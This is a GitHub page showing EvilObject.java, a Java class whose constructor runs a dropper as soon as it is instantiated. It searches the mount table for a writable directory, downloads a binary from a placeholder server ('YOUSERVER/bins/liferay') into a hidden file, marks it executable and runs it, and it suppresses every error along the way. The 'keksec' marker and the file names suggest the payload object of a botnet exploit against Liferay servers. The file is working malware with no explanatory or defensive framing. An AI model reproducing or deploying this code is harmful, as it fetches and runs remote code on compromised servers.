-
Notifications
You must be signed in to change notification settings - Fork 21
/
Copy pathEvilObject.java
78 lines (72 loc) · 1.86 KB
/
EvilObject.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import java.io.FileReader;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.File;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.URI;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.io.FileWriter;
public class EvilObject {
public static void download(String url, String fileName) throws Exception {
try (InputStream in = URI.create(url).toURL().openStream()) {
Files.copy(in, Paths.get(fileName));
}
}
public void dlexe(String FILE_URL, String FILE_NAME, int chmod) {
try {
download(FILE_URL, FILE_NAME);
if(chmod == 1) {
File file = new File(FILE_NAME);
file.setExecutable(true);
file.setReadable(true);
file.setWritable(true);
}
Runtime.getRuntime().exec(FILE_NAME);
} catch(Exception e) {
}
}
public boolean runkek(String dir) {
try{
FileWriter myWriter = new FileWriter(dir + "/.keksec");
myWriter.write("keksec");
myWriter.close();
}catch(Exception e) {
return false;
}
try {
File f = new File(dir + "/.keksec");
if(f.exists()) {
f.delete();
dlexe("http://YOUSERVER/bins/liferay", dir + "/.wjnlwejfnlewk", 1);
return true;
}
} catch(Exception e) {
}
return false;
}
public EvilObject() throws Exception {
try
{
File file=new File("/proc/self/mounts"); //creates a new file instance
FileReader fr=new FileReader(file); //reads the file
BufferedReader br=new BufferedReader(fr); //creates a buffering character input stream
String line;
while((line=br.readLine())!=null)
{
if(line.contains("rw")) {
if(new File(line.split(" ")[1]).canWrite()) {
if(runkek(line.split(" ")[1])) {
return;
}
}
}
fr.close();
}
}catch(IOException e)
{
e.printStackTrace();
}
}
}